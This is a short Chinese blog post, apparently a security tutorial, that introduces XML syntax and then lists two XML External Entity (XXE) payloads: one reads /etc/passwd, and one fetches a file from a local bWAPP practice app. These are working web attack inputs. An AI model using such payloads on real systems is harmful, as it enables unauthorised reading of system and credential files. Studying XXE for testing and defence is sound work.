XML External Entity attack
XML External Entity attack
逍遥子大表哥
发布于 2021-12-17 15:11:48
发布于 2021-12-17 15:11:48
XML 被设计用来传输和存储数据。
语法规则
<?xml version="1.0" encoding="UTF-8"?> <!--XML 声明-->
<girl age="18"> <!--自定的根元素girl;age属性需要加引导-->
<hair>长头发</hair> <!--自定义的4个子元素,即girl对象的属性-->
<eye>大眼睛</eye>
<face>可爱的脸庞</face>
<summary>可爱美丽的女孩</summary>
</girl> <!--根元素的闭合-->Payload
获取账户密码:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xxe>&xxe;</xxe>
读取网站任意文件:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[
<!ENTITY xxe SYSTEM "http://127.0.0.1/bWAPP/robots.txt">
]>
<reset><login>&xxe;</login><secret>Any bugs?</secret></reset>
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/1920670
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
